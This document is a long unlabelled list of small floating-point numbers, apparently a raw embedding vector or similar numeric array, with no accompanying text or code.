0.00031321667484007776, -0.006068986374884844, -0.011432959698140621, -0.01338349562138319, -0.02474595420062542, 0.006098362151533365, -0.01540453266352415, -0.014076758176088333, 0.02331242896616459, 0.019787363708019257, 0.005860419943928719, 0.044979825615882874, -0.022196156904101372, -0.03252459689974785, -0.004318204242736101, -0.0363316684961319, -0.014194260351359844, 0.027307501062750816, -0.004441581666469574, 0.020821383222937584, -0.007790393196046352, -0.0012396477395668626, -0.0014651049859821796, -0.026202980428934097, 0.007097130175679922, 0.00165237404871732, -0.0029390226118266582, -0.01722581684589386, 0.010845448821783066, 0.0023118548560887575, -0.017178814858198166, -0.009341421537101269, 0.015028526075184345, -0.017167065292596817, 0.014664269052445889, -0.02178489975631237, -0.021044636145234108, -0.002319198800250888, -0.01934085600078106, 0.0014739177422598004, 0.007308633998036385, -0.0005999953718855977, 0.014922774396836758, 0.0025777036789804697, 0.01143883541226387, -0.009952432475984097, -0.026531986892223358, 0.00029191942303441465, 0.015768788754940033, 0.0017977829556912184, -0.01766057498753071, 0.013101490214467049, -0.014300012961030006, 0.009864306077361107, -0.0009091729298233986, 0.013665501028299332, -0.013101490214467049, 0.004926277790218592, -0.04450981691479683, -0.013312994502484798, -0.0008783286320976913, -0.01460551843047142, 0.030550561845302582, -0.017331568524241447, -0.017284566536545753, 0.015651287510991096, 0.002145883161574602, -0.012690233066678047, -0.012995738536119461, -0.00732625974342227, 0.0004729461797978729, 0.03257159888744354, -0.008548282086849213, 0.020034117624163628, 0.009952432475984097, -0.013489247299730778, 0.002812707796692848, -0.01655605435371399, 0.017801577225327492, 0.05353398248553276, -0.008941913954913616, 0.03962172567844391, -0.00033763510873541236, -0.004423956386744976, -0.01890609785914421, -0.010622194968163967, 0.013195492327213287, -0.030339056625962257, -0.010798448696732521, 0.016767557710409164, -0.04883389547467232, -0.007179381791502237, -0.010868949815630913, 0.014593767933547497, 0.01072207186371088, -0.040984753519296646, 0.00603961106389761, -0.031185071915388107, 0.024510949850082397, 0.015087276697158813, 0.005381598602980375, -0.001896191039122641, -0.012043971568346024, 0.031138071790337563, -0.012666733004152775, -0.009441298432648182, -0.013183741830289364, 0.06425017863512039, -0.03174908459186554, 0.01588629186153412, -0.0072616334073245525, 0.026555487886071205, 0.01512252725660801, 0.012349477037787437, -0.008066522888839245, 0.0029948363080620766, -0.002238416112959385, -0.005305222235620022, -0.04288828745484352, 0.021984653547406197, -0.026954995468258858, -0.024675453081727028, 0.006339241284877062, -0.02474595420062542, 0.008648158982396126, 0.006368617061525583, 0.010904200375080109, 0.0009804086294025183, 0.04533233121037483, 0.021420642733573914, 0.002815645420923829, -0.022313660010695457, -0.004441581666469574, 0.019399605691432953, 0.009012415073812008, -0.027048997581005096, -0.0014768552500754595, 0.03414612635970116, -0.015604286454617977, 0.008736285381019115, -0.003648441983386874, 0.019023599103093147, 0.00513190682977438, 0.033323612064123154, 0.022948171943426132, -0.018271585926413536, -0.0024748891592025757, -0.03414612635970116, -0.029093533754348755, -0.0257564727216959, 0.017531322315335274, 0.03252459689974785, 0.006063111126422882, -0.026038477197289467, 0.022419411689043045, -0.022525163367390633, -0.014875773340463638, -0.040068235248327255, -0.004406331107020378, -0.024722453206777573, -0.011597462929785252, -0.018894346430897713, 0.008560032583773136, 0.022666165605187416, 0.020034117624163628, 0.02362968400120735, -0.009300296194851398, -0.003516252152621746, 0.03057406097650528, 0.008242776617407799, -0.022948171943426132, 0.009406047873198986, 0.0023661996237933636, -0.004203639458864927, -0.022325409576296806, 0.02930503897368908, -0.0007711079088039696, -0.004541458562016487, -0.016262298449873924, -0.001689093536697328, -0.024087943136692047, 0.024017440155148506, -0.027378002181649208, 0.023711934685707092, 0.03285360336303711, -0.030268555507063866, -0.03520364686846733, 0.03355861455202103, 0.012337726540863514, -0.01157396286725998, 0.0003851867513731122, -0.01270198356360197, -0.02895253151655197, -0.016180047765374184, 0.02391168847680092, -0.01594504341483116, 0.021549895405769348, -0.012349477037787437, 0.0017170002683997154, -0.0045737712644040585, -0.05734105408191681, 0.02078613080084324, 0.008066522888839245, -0.018541840836405754, -0.007784517947584391, 0.01388875488191843, 0.0014371982542797923, 0.021420642733573914, -0.028224017471075058, -0.01841258816421032, 0.04093775153160095, -0.0031901835463941097, -0.04011523723602295, -0.012220224365592003, 0.011485835537314415, -0.012995738536119461, -0.01704956218600273, 0.01781332679092884, -0.01991661638021469, 0.02170264907181263, -0.004391643218696117, 0.020797882229089737, -0.001947598299011588, 0.0455908365547657, -0.0015921542653813958, 0.029422540217638016, -0.037788692861795425, -0.02871752716600895, 0.009629301726818085, 0.0035896908957511187, 0.0043652052991092205, -0.024134943261742592, 0.005363973323255777, 0.0024866394232958555, 0.030550561845302582, -0.04279428720474243, -0.009946557693183422, -0.00035195567761547863, 0.019364355131983757, -0.0011515211081132293, -0.023077424615621567, -0.03048005886375904, -0.0211151372641325, -0.0001512840244686231, -0.015028526075184345, -0.0021502894815057516, -0.021831901744008064, -0.011850092560052872, -0.005728230345994234, 0.02526296302676201, 0.0008416092023253441, -0.02017511986196041, -0.01992836594581604, 0.005134844221174717, -0.03073856420814991, -0.012067471630871296, 0.009464798495173454, 0.024886956438422203, -0.015322281047701836, 0.000507829652633518, -0.010492942295968533, -0.01005230937153101, -0.01892959699034691, 0.005792856216430664, -0.031114570796489716, 0.0008225151104852557, 0.009558800607919693, -0.022936420515179634, -0.00330474809743464, 0.0010362222092226148, 0.0215263944119215, -0.004673648159950972, -0.006644747219979763, -0.021326642483472824, 0.008372028358280659, -0.02338293008506298, 0.03832920268177986, -0.015674788504838943, -0.015381032600998878, -0.03471013903617859, 0.0295635424554348, -0.05174795165657997, 0.01596854254603386, -0.01790732890367508, -0.040232740342617035, 0.007320384494960308, 0.01489927340298891, 0.010927700437605381, 0.023077424615621567, -0.025568470358848572, 0.02203165367245674, -0.008983040228486061, 0.0018080644076690078, 0.01882384531199932, -0.011932344175875187, -0.006938502192497253, 0.005772293545305729, 0.03325311094522476, 0.015416283160448074, -0.006221739109605551, -0.030527060851454735, 0.03588515892624855, 0.033229611814022064, -0.018553590402007103, 0.0006936299032531679, 0.006826875265687704, 0.019141102209687233, 0.02220790833234787, -0.00762001471593976, 0.022360660135746002, -0.0005144391325302422, 0.006403867620974779, -0.007790393196046352, -0.010739697143435478, 0.0033517491538077593, -0.029493041336536407, 0.003798257326707244, 0.021303141489624977, -0.0013476028107106686, -0.009276795201003551, 0.029093533754348755, -0.013559749349951744, 0.034240130335092545, 0.009382546879351139, -0.0041507636196911335, -0.007061879616230726, 0.011797216720879078, 0.006568370386958122, -0.03894021362066269, -0.00006311151082627475, -0.0190118495374918, -0.013171992264688015, 0.0018036580877378583, 0.030104052275419235, 0.023206675425171852, -0.005178907420486212, -0.002338293008506298, -0.014699519611895084, -0.03612016141414642, -0.0027319251094013453, 0.0017258129082620144, -0.032477594912052155, -0.0034633760806173086, 0.04385180398821831, -0.017449069768190384, 0.008618783205747604, -0.015181278809905052, 0.012643232010304928, -0.013101490214467049, -0.011844217777252197, -0.022078655660152435, -0.003824695246294141, -0.013877004384994507, -0.015475033782422543, 0.015651287510991096, 0.04194827005267143, 0.00856590736657381, -0.011380083858966827, -0.017707575112581253, 0.02126789093017578, 0.01354799885302782, 0.0190000981092453, 0.006209989078342915, 0.009658677503466606, -0.023535681888461113, 0.015416283160448074, 0.019705111160874367, 0.01662655547261238, -0.021514644846320152, 0.007238132879137993, -0.008383778855204582, -0.01494627445936203, -0.02836502157151699, 0.007573014125227928, 0.005466788075864315, -0.014006257057189941, -0.010780822485685349, 0.02118563838303089, 0.001147849252447486, -0.04013873636722565, -0.007332134526222944, 0.005892733111977577, 0.017883827909827232, -0.011027577333152294, -0.0057517304085195065, 0.008436654694378376, 0.0257564727216959, -0.01596854254603386, -0.00626874016597867, 0.02751900441944599, -0.012455228716135025, 0.015992043539881706, -0.002505733398720622, -0.0058310446329414845, -0.04063224419951439, -0.0026996121741831303, -0.0016611868049949408, -0.008513031527400017, 0.013571498915553093, -0.020974135026335716, 0.031114570796489716, 0.007567138876765966, -0.0024954520631581545, -0.011397709138691425, -0.020374873653054237, -0.008542407304048538, -0.007003128528594971, -0.011897093616425991, 0.0005551977083086967, -0.02388818934559822, -0.014170760288834572, 0.006145362742245197, 0.036942679435014725, 0.014264761470258236, -0.0052729095332324505, 0.009453048929572105, -0.0011015827767550945, 0.012184973806142807, 0.005540226586163044, -0.009394297376275063, -0.00368369254283607, 0.01816583424806595, -0.007291008718311787, 0.016673555597662926, -0.018812095746397972, 0.01460551843047142, 0.011244956403970718, -0.039292722940444946, 0.0009260638616979122, -0.025685971602797508, 0.04248877987265587, -0.015980293974280357, -0.035509150475263596, 0.03024505451321602, 0.017754575237631798, -0.01177959144115448, 0.036425668746232986, 0.008624657988548279, 0.009494174271821976, -0.006568370386958122, -0.004265328403562307, 0.008783286437392235, -0.018048331141471863, -0.023782435804605484, 0.003663129871711135, 0.006456743460148573, -0.002502796007320285, -0.0041125756688416, -0.0023632622323930264, -0.008336777798831463, 0.006433242931962013, -0.001009784173220396, -0.01594504341483116, -0.00679749995470047, -0.010410691611468792, 0.001947598299011588, 0.012014595791697502, -0.015815790742635727, 0.007132380735129118, 0.011121579445898533, 0.0223724115639925, 0.004538520704954863, -0.007267508655786514, -0.0069913784973323345, 0.01630929857492447, 0.02481645531952381, 0.003381124697625637, 0.012396477162837982, 0.005528476554900408, -0.0008900788379833102, -0.009494174271821976, -0.018389087170362473, 0.005290534812957048, -0.014546766877174377, -0.009317921474575996, 0.029657544568181038, 0.0030785566195845604, 0.011609213426709175, -0.00819577556103468, 0.012302475981414318, -0.005651853978633881, 0.0069913784973323345, 0.00762001471593976, 0.009129917249083519, -0.004400455858558416, -0.007197007071226835, 0.004144888836890459, 0.006045485846698284, 0.03250109776854515, 0.04836388677358627, -0.00755538884550333, -0.010927700437605381, 0.030268555507063866, 0.022654416039586067, 0.01662655547261238, 0.002479295479133725, 0.002511608647182584, 0.02820051833987236, -0.0028758652042597532, -0.020116370171308517, -0.01320724282413721, -0.010346065275371075, 0.01405325811356306, -0.0010795510606840253, 0.037271685898303986, -0.012173223309218884, 0.028647026047110558, 0.018800344318151474, -0.0012866486795246601, 0.00009156906162388623, -0.019058849662542343, -0.00033781869569793344, -0.021350141614675522, 0.005942671559751034, 0.0012638826156035066, 0.00004009302210761234, -0.018859095871448517, -0.008812662214040756, -0.000008038111445785034, 0.003125557443127036, 0.0018917847191914916, 0.00152605923358351, 0.008407278917729855, -0.010833699256181717, 0.018118832260370255, -0.03388762101531029, -0.0011698808521032333, 0.0005632759421132505, 0.008554156869649887, 0.019810862839221954, 0.005214158445596695, -0.01613304577767849, -0.02660248801112175, -0.016368050128221512, 0.014123759232461452, -0.009676302783191204, 0.004656022880226374, -0.007496637757867575, -0.01613304577767849, 0.017002562060952187, 0.016661806032061577, -0.00513190682977438, 0.05132494121789932, -0.008272151462733746, 0.008842037059366703, -0.00035985035356134176, 0.04086725041270256, -0.005569602362811565, 0.032477594912052155, -0.010111060924828053, -0.01237297710031271, 0.001640623901039362, -0.021056385710835457, 0.00202544336207211, 0.038799211382865906, 0.03005705215036869, -0.012760734185576439, 0.025638971477746964, -0.014018007554113865, -0.013277743943035603, 0.013618499971926212, 0.039292722940444946, -0.01118620578199625, -0.02295992150902748, 0.008800911717116833, 0.015416283160448074, -0.013418746180832386, -0.002065100474283099, 0.009846680797636509, -0.03236009553074837, -0.03428712859749794, 0.022501662373542786, 0.005716479849070311, 0.004479769617319107, -0.01528703048825264, 0.02507496066391468, -0.010281438939273357, 0.025380466133356094, -0.0002116874820785597, -0.016567803919315338, -0.03447513282299042, -0.033229611814022064, 0.0073967608623206615, 0.014182510785758495, -0.0118265924975276, 0.002861177548766136, 0.0026878619100898504, -0.0061101121827960014, 0.001959348563104868, 0.02009286917746067, 0.02076263166964054, -0.011156830005347729, -0.0040861377492547035, 0.023829437792301178, -0.026108980178833008, -0.025732971727848053, 0.002646736102178693, -0.03510964289307594, 0.008560032583773136, 0.0005658463342115283, -0.02813001722097397, 0.010716197080910206, 0.01126845646649599, 0.021079886704683304, -0.023194925859570503, -0.01789557933807373, 0.0034604384563863277, -0.013371745124459267, 0.010792572982609272, -0.0022516350727528334, 0.004171326756477356, -0.016603054478764534, 0.0034898140002042055, 0.008589407429099083, 0.0049321530386805534, 0.007866769097745419, 0.006280490197241306, -0.04432181268930435, 0.0031989961862564087, 0.016356300562620163, -0.018541840836405754, 0.014041507616639137, -0.0058134193532168865, -0.022865919396281242, -0.02643798477947712, 0.009793804958462715, -0.01646205224096775, -0.02245466224849224, -0.008753910660743713, -0.008783286437392235, 0.01697906106710434, 0.014206010848283768, -0.0015877479454502463, -0.00244698254391551, -0.011949969455599785, -0.00932379625737667, -0.007020753808319569, 0.014664269052445889, 0.026038477197289467, -0.0147817712277174, -0.01654430292546749, 0.019141102209687233, -0.01994011551141739, -0.028271019458770752, 0.011885343119502068, 0.0020606941543519497, 0.0005515257362276316, -0.007872644811868668, 0.008930164389312267, -0.014969774521887302, 0.012384727597236633, -0.03015105426311493, -0.005178907420486212, -0.00806064810603857, -0.001274164067581296, -0.01620354689657688, -0.01941135711967945, -0.00019075740419793874, 0.005566664505749941, -0.01898834854364395, 0.005393349099904299, 0.015768788754940033, 0.016003793105483055, 0.025991477072238922, -0.014558517374098301, 0.009975933469831944, -0.009840806014835835, 0.018365588039159775, 0.03790619596838951, -0.014535017311573029, 0.03259509801864624, -0.008595283143222332, 0.030715063214302063, -0.008971289731562138, 0.013066239655017853, -0.027236999943852425, -0.012149723246693611, 0.0003760069084819406, -0.004723586607724428, 0.0063627418130636215, -0.004309391602873802, 0.003008055267855525, 0.0037189433351159096, 0.012102722190320492, -0.0053110974840819836, -0.008918413892388344, -0.03243059664964676, 0.008377904072403908, 0.009541175328195095, -0.013371745124459267, -0.006444993428885937, 0.007496637757867575, -0.0001371470425510779, 0.024957457557320595, -0.0049057151190936565, 0.00736738508567214, 0.010116935707628727, -0.02972804568707943, -0.0164503026753664, -0.025356965139508247, 0.0004593599878717214, 0.0023250740487128496, 0.01586279086768627, 0.010475317016243935, 0.006950252689421177, -0.01639155112206936, 0.023241925984621048, 0.01994011551141739, -0.012913486920297146, -0.007596514653414488, -0.0020210370421409607, -0.010816073976457119, 0.0013409933308139443, 0.009652801789343357, 0.032642100006341934, -0.0019035349832847714, -0.013066239655017853, 0.02441694773733616, 0.01460551843047142, -0.009018290787935257, 0.008889038115739822, -0.02051587589085102, -0.022912921383976936, 0.009341421537101269, -0.0020606941543519497, -0.03073856420814991, 0.0009444236056879163, 0.019998867064714432, -0.0320780873298645, 0.002590922638773918, -0.0084484051913023, -0.006345116533339024, 0.03287710249423981, 0.04131375998258591, -0.002508671022951603, 0.005502038635313511, -0.005111343692988157, 0.01088657509535551, 0.02321842685341835, -0.008319152519106865, -0.011485835537314415, 0.006956127937883139, 0.009100542403757572, 0.032806601375341415, 0.03515664488077164, 0.01731981709599495, -0.011750215664505959, 0.0012756327632814646, 0.015992043539881706, 0.01731981709599495, -0.017026063054800034, -0.005446224939078093, -0.014582017436623573, 0.010833699256181717, 0.006956127937883139, 0.03184308484196663, 0.019658111035823822, -0.00677399942651391, 0.0278715118765831, 0.00895366445183754, -0.013912255875766277, 0.00009294604387832806, 0.0012616794556379318, 0.000443203462054953, -0.02178489975631237, 0.042512279003858566, -0.015216529369354248, 0.0185888409614563, -0.01004055980592966, 0.0044386438094079494, 0.0018697531195357442, -0.008507155813276768, -0.011538712307810783, 0.02042187564074993, -0.020586378872394562, -0.01898834854364395, 0.017789825797080994, 0.0032048714347183704, 0.02086838334798813, -0.006674122530966997, -0.004940965678542852, -0.029352039098739624, 0.018624091520905495, 0.020668629556894302, 0.01950535736978054, -0.01951710879802704, 0.006644747219979763, -0.0005162751185707748, 0.0006620511994697154, -0.03757718950510025, -0.01258448138833046, 0.027566006407141685, 0.00472946185618639, -0.022689666599035263, -0.01055756863206625, -0.017014311626553535, -0.017531322315335274, 0.013359995558857918, -0.0042300778441131115, -0.021491143852472305, -0.011145079508423805, -0.006556620355695486, 0.03073856420814991, -0.01688506081700325, -0.008800911717116833, 0.013359995558857918, 0.001565716229379177, -0.02650848589837551, 0.0011338958283886313, -0.00937079731374979, 0.0003668270364869386, -0.00967042800039053, -0.0033488115295767784, 0.027636507526040077, -0.009259169921278954, 0.010375440120697021, 0.006962002720683813, 0.005231783725321293, 0.011350708082318306, -0.017930829897522926, 0.021397143602371216, 0.018612341955304146, 0.022243158891797066, 0.018353836610913277, -0.00032588490284979343, -0.00498209148645401, -0.03165508061647415, 0.002235478488728404, -0.002241353737190366, -0.014182510785758495, -0.025991477072238922, -0.001562778721563518, 0.003154932986944914, -0.028247518464922905, 0.001268288935534656, 0.008554156869649887, 0.007150006480515003, 0.003956885077059269, 0.005643041338771582, -0.014018007554113865, -0.005393349099904299, 0.002244291128590703, -0.02043362520635128, 0.013371745124459267, -0.0030550560913980007, 0.013677251525223255, 0.00966455228626728, -0.027472004294395447, -0.012901737354695797, -0.010839574038982391, 0.003980385605245829, 0.02254866436123848, 0.029164034873247147, -0.0029757420998066664, -0.02042187564074993, -0.008871412836015224, 0.006556620355695486, 0.008983040228486061, -0.005434474907815456, -0.010586944408714771, -0.019787363708019257, -0.019035348668694496, 0.029963050037622452, -0.0008335309103131294, 0.010769072920084, 0.01046944223344326, -0.0019152851309627295, 0.0006616840255446732, 0.011174455285072327, -0.0007398963789455593, -0.011380083858966827, 0.004456269554793835, 0.012055721133947372, 0.00017597783880773932, 0.011832467280328274, 0.00006329510506475344, 0.021126888692378998, 0.001947598299011588, -0.024628452956676483, 0.016344550997018814, -0.008847912773489952, -0.005778168793767691, 0.02060987800359726, 0.004899839870631695, 0.007907895371317863, -0.005625415593385696, 0.039316222071647644, -0.018729843199253082, 0.00006499337905552238, 0.002473420463502407, -0.010310814715921879, -0.005581352394074202, 0.012026345357298851, 0.0038570084143429995, 0.005692979320883751, 0.014452765695750713, -0.020915383473038673, 0.006709373090416193, 0.005120156332850456, 0.008283901959657669, -0.010328439995646477, 0.007385010831058025, 0.001216881675645709, -0.0055431644432246685, 0.005434474907815456, 0.017261067405343056, 0.01815408281981945, 0.011338958516716957, -0.007672891020774841, 0.011891217902302742, 0.001463636290282011, -0.005384536460042, -0.011421210132539272, -0.00010263078729622066, 0.029916049912571907, -0.014264761470258236, 0.010827823542058468, -0.0007428339449688792, 0.008571782149374485, 0.015580786392092705, -0.0031901835463941097, -0.009259169921278954, 0.0047794003039598465, 0.0029037720523774624, -0.02643798477947712, 0.0007564201368950307, 0.01816583424806595, 0.0020621628500521183, 0.011808967217803001, 0.0007252086070366204, -0.019693361595273018, -0.02103288657963276, 0.01499327551573515, -0.009928932413458824, 0.007702266331762075, -0.02391168847680092, 0.0005482209962792695, -0.0030814940109848976, -0.004315266851335764, -0.002473420463502407, 0.0038276328705251217, -0.006403867620974779, 0.025709472596645355, 0.01494627445936203, -0.0032019338104873896, 0.016426801681518555, 0.0020239746663719416, 0.013865254819393158, 0.025544969365000725, -0.009018290787935257, 0.004846964031457901, -0.017026063054800034, 0.008518906310200691, -0.03943372517824173, -0.006215864326804876, -0.014711270108819008, 0.010586944408714771, -0.0032313093543052673, -0.00007798287697369233, -0.0021356018260121346, -0.023288927972316742, 0.013160241767764091, -0.0002647470391821116, 0.015251779928803444, 0.0008467499283142388, 0.001105989096686244, -0.022595664486289024, 0.006186488550156355, 0.022771917283535004, 0.0063803670927882195, -0.0003088103549089283, -0.0006536057335324585, 0.009094666689634323, -0.006562495604157448, 0.02718999981880188, -0.0011383021483197808, 0.02312442474067211, -0.0036014411598443985, -0.004368142690509558, 0.020139869302511215, 0.004021511413156986, 0.006915002129971981, 0.0023206674959510565, -0.0008056241786107421, -0.010504692792892456, -0.0012888518394902349, 0.006339241284877062, 0.0012425853637978435, 0.0041125756688416, -0.032548096030950546, -0.007473137229681015, -0.009024165570735931, -0.010275563225150108, 0.020880132913589478, -0.029093533754348755, -0.0018756281351670623, -0.00924741942435503, -0.016086045652627945, 0.0017992517678067088, 0.005519663915038109, 0.00548735074698925, -0.0021958216093480587, 0.020398374646902084, 0.010099310427904129, -0.01405325811356306, -0.0059397341683506966, 0.000017705648133414797, -0.016074294224381447, -0.012220224365592003, -0.014699519611895084, -0.017026063054800034, 0.009282669983804226, -0.0007777173887006938, 0.006433242931962013, -0.025803474709391594, -0.011626838706433773, 0.004996779374778271, 0.007925520651042461, 0.030715063214302063, 0.010845448821783066, 0.006186488550156355, -0.011156830005347729, 0.0010237375972792506, -0.01005230937153101, 0.005046717822551727, 0.010028809309005737, 0.013536248356103897, 0.010087559930980206, 0.008031272329390049, -0.02220790833234787, -0.0005511585623025894, -0.027566006407141685, -0.0027142998296767473, 0.008172275498509407, 0.007067754864692688, -0.0004446722159627825, -0.01283123530447483, 0.011397709138691425, 0.016520803794264793, -0.017942579463124275, 0.008583532646298409, -0.012043971568346024, 0.0181423332542181, 0.0011485836002975702, 0.0007233726792037487, 0.008871412836015224, 0.002629110822454095, 0.026884494349360466, 0.015040276572108269, -0.000014859891962260008, 0.013101490214467049, -0.008442530408501625, -0.027495505288243294, -0.024052690714597702, -0.009629301726818085, 0.01957586035132408, -0.011656214483082294, -0.027566006407141685, 0.02516896277666092, -0.0017081876285374165, -0.0007637640228495002, 0.013971006497740746, 0.010181562043726444, 0.01439401414245367, -0.014206010848283768, 0.011262581683695316, -0.006468493957072496, -0.04418081045150757, 0.00045789123396389186, -0.005707667209208012, -0.012995738536119461, -0.004335829522460699, 0.010463567450642586, -0.008554156869649887, -0.00907116662710905, -0.014723020605742931, 0.008477780967950821, 0.009823180735111237, -0.00500559201464057, 0.020750880241394043, 0.016332799568772316, -0.008466030471026897, 0.008930164389312267, 0.0261794812977314, -0.018870847299695015, 0.018189333379268646, -0.007608264684677124, -0.0005232517723925412, -0.0010494411690160632, 0.006280490197241306, -0.013195492327213287, -0.010910075157880783, 0.0014643706381320953, 0.015745289623737335, 0.0010119873331859708, 0.010792572982609272, -0.004318204242736101, -0.025897474959492683, -0.00255420315079391, 0.010028809309005737, 0.01461726799607277, -0.0068738763220608234, 0.007907895371317863, -0.0013329151552170515, -0.007437886670231819, 0.002608547918498516, -0.02533346600830555, -0.018694592639803886, -0.00679749995470047, 0.014182510785758495, 0.011209705844521523, 0.00702662905678153, 0.026578988879919052, -0.0027216437738388777, -0.00012558042362798005, 0.029916049912571907, -0.009423673152923584, 0.00035709640360437334, -0.005034967325627804, -0.007402636110782623, 0.011162704788148403, 0.010111060924828053, 0.020715629681944847, -0.010404815897345543, 0.013536248356103897, -0.010863074101507664, 0.0006602152716368437, 0.010581069625914097, 0.019446607679128647, -0.0028890843968838453, -0.0009987683733925223, 0.019881365820765495, -0.008307402953505516, 0.012396477162837982, 0.007185257039964199, -0.009617551229894161, -0.010733822360634804, -0.009928932413458824, -0.010569319128990173, -0.03165508061647415, -0.01177959144115448, 0.014311762526631355, 0.019129350781440735, 0.008054773323237896, 0.02422894537448883, -0.01637980155646801, -0.000018933453247882426, 0.003439875552430749, -0.0185888409614563, -0.038799211382865906, 0.00732625974342227, 0.00016477842291351408, 0.016332799568772316, -0.010704446583986282, 0.0008239838643930852, -0.0011698808521032333, -0.005014404654502869, 0.002223728224635124, -0.023371178656816483, 0.02110338769853115, -0.013054490089416504, 0.006286365445703268, -0.017378568649291992, -0.0017816264880821109, -0.001697906176559627, 0.013348245061933994, -0.012255474925041199, 0.00191087881103158, -0.014029758051037788, 0.004899839870631695, 0.005452100187540054, 0.0027833322528749704, 0.011121579445898533, 0.01439401414245367, 0.005343410652130842, -0.0021708523854613304, 0.034404631704092026, 0.02559196949005127, 0.008642283268272877, 0.0002441841643303633, -0.03388762101531029, -0.005046717822551727, -0.01545153371989727, -0.008460155688226223, 0.018342087045311928, 0.012067471630871296, 0.021855400875210762, -0.007878519594669342, -0.005099593661725521, -0.010968826711177826, 0.013265993446111679, 0.02425244450569153, -0.010240312665700912, -0.005833982024341822, -0.0037630065344274044, 0.0067211235873401165, 0.012643232010304928, 0.0013395246351137757, -0.0005485881702043116, -0.002401450416073203, -0.004506207536906004, 0.0044386438094079494, -0.006350991781800985, -0.024675453081727028, -0.0003317600057926029, 0.014300012961030006, -0.00475296238437295, 0.006491994019597769, -0.00979967974126339, 0.018682843074202538, 0.008712785318493843, -0.0026070792227983475, 0.014499765820801258, -0.025944476947188377, 0.016603054478764534, 0.00950004905462265, 0.015980293974280357, 0.027636507526040077, -0.006204113829880953, 0.028600025922060013, 0.013712502084672451, -0.0007828581146895885, -0.015334031544625759, 0.02086838334798813, -0.01194409467279911, 0.00278773857280612, -0.022090405225753784, 0.0002160938165616244, 0.008607032708823681, 0.006674122530966997, 0.02523946389555931, -0.0028949594125151634, 0.00870103482156992, -0.004670710768550634, 0.021138638257980347, 0.0069208769127726555, -0.010205062106251717, -0.02897603251039982, 0.026367483660578728, -0.033817119896411896, -0.022654416039586067, -0.004799962975084782, 0.008513031527400017, -0.009552925825119019, 0.01287823636084795, -0.021820150315761566, -0.01848308928310871, 0.01055756863206625, 0.0002440005773678422, 0.0099171819165349, -0.008189900778234005, 0.01789557933807373, -0.01646205224096775, -0.004080262500792742, 0.005927983671426773, 0.030433058738708496, 0.007420261390507221, 0.00203719362616539, 0.006668247282505035, 0.01220847386866808, 0.000763029616791755, -0.007496637757867575, -0.007925520651042461, 0.004888089839369059, -0.011297832243144512, 0.0003767412854358554, 0.01909410022199154, -0.020727381110191345, -0.012126222252845764, -0.008771535940468311, 0.00067306705750525, -0.0026599550619721413, 0.014300012961030006, -0.001070004072971642, -0.015052026137709618, -0.014934523962438107, -0.01113920472562313, -0.005032029934227467, -0.014969774521887302, 0.0043652052991092205, -0.03134957700967789, 0.007990146987140179, -0.012690233066678047, 0.005540226586163044, 0.023441679775714874, 0.017449069768190384, -0.02439344860613346, -0.011620962992310524, 0.001199256395921111, 0.014170760288834572, -0.013418746180832386, 0.013571498915553093, 0.014805272221565247, -0.007960771210491657, -0.026625989004969597, 0.014382263645529747, 0.00005393165338318795, 0.010534068569540977, 0.009881931357085705, 0.031138071790337563, -0.007496637757867575, -0.02264266647398472, -0.027001995593309402, 0.0020533502101898193, -0.014311762526631355, 0.019611110910773277, 0.00835440307855606, 0.018565339967608452, -0.0007340213051065803, 0.0005834716721437871, 0.004188952036201954, 0.00941192265599966, 0.003243059618398547, 0.004332892131060362, 0.006509619299322367, -0.011056953109800816, 0.010328439995646477, 0.00836027879267931, -0.00730275921523571, -0.02288942039012909, 0.00702662905678153, -0.006838625762611628, 0.013230742886662483, 0.011080453172326088, -0.017284566536545753, 0.00344281317666173, 0.030433058738708496, 0.007467261981219053, -0.028694026172161102, -0.004400455858558416, 0.0003163378278259188, -0.012431728653609753, 0.021338392049074173, 0.015228279866278172, 0.0048264008946716785, 0.008460155688226223, -0.008325028233230114, -0.00525822164490819, -0.0020797881297767162, -0.0049321530386805534, -0.020327873528003693, -0.016356300562620163, 0.006938502192497253, -0.0036131914239376783, -0.0006528713856823742, 0.004156638868153095, -0.012431728653609753, -0.012314226478338242, 0.016861559823155403, -0.008947789669036865, -0.045050326734781265, -0.01578054018318653, -0.00629224069416523, -0.010357814840972424, 0.007296883966773748, 0.003378187073394656, -0.023347679525613785, -0.02052762731909752, -0.002040131250396371, 0.0031666832510381937, 0.01882384531199932, 0.0005221501924097538, 0.009441298432648182, 0.012067471630871296, -0.008971289731562138, -0.0040156361646950245, -0.0035808782558888197, 0.006350991781800985, 0.0034898140002042055, -0.0011272863484919071, 0.02432294748723507, -0.009218044579029083, 0.0030873692594468594, -0.012361226603388786, 0.012337726540863514, 0.002091538393869996, 0.011156830005347729, 0.0020900696981698275, -0.016074294224381447, -0.019188102334737778, -0.005299347452819347, -0.007484887260943651, 0.010410691611468792, 0.003566190367564559, -0.00757888937368989, 0.004940965678542852, -0.0008041553664952517, -0.001568653853610158, -0.020233871415257454, -0.011039327830076218, -0.005181845277547836, -0.005011466797441244, -0.0006936299032531679, 0.00500559201464057, -0.029328538104891777, -0.006215864326804876, -0.009646927006542683, -0.0011170048965141177, -0.002695205621421337, 0.017014311626553535, -0.006791624706238508, -0.008753910660743713, 0.000016649963072268292, -0.019622860476374626, 0.01977561227977276, -0.0198461152613163, -0.005296409595757723, 0.00036792861646972597, -0.014464515261352062, 0.01170321460813284, -0.003660192247480154, -0.008242776617407799, -0.00007449453551089391, -0.008430779911577702, -0.0030065863393247128, 0.021949402987957, 0.003037430811673403, 0.006333366502076387, -0.0026393921580165625, 0.027660008519887924, -0.0097115533426404, 0.0022105092648416758, 0.015075527131557465, 0.00870103482156992, 0.008571782149374485, -0.008695160038769245, 0.00810764916241169, -0.012349477037787437, 0.009077041409909725, -0.0007479746709577739, -0.0009517674916423857, 0.003812944982200861, 0.007003128528594971, -0.025638971477746964, -0.011550461873412132, 0.0040156361646950245, -0.00963517650961876, -0.013136740773916245, -0.004544395953416824, -0.018224583938717842, 0.014029758051037788, 0.013830004259943962, 0.003633754327893257, -0.012619731947779655, 0.0030726813711225986, -0.013359995558857918, 0.01512252725660801, 0.015298780985176563, 0.010962950997054577, 0.0329476036131382, 0.007655265741050243, -0.003172558266669512, -0.011949969455599785, -0.010710321366786957, 0.0011162705486640334, 0.00870103482156992, -0.0034516258165240288, -0.0027363314293324947, 0.01060456968843937, -0.0008607032941654325, 0.014523266814649105, 0.016062544658780098, -0.0066329967230558395, 0.03755369037389755, -0.003160808002576232, -0.031044069677591324, 0.005228845868259668, 0.018518339842557907, 0.011685589328408241, -0.006821000017225742, -0.012478728778660297, -0.007197007071226835, -0.010281438939273357, -0.006703498307615519, 0.007214632350951433, -0.0032313093543052673, 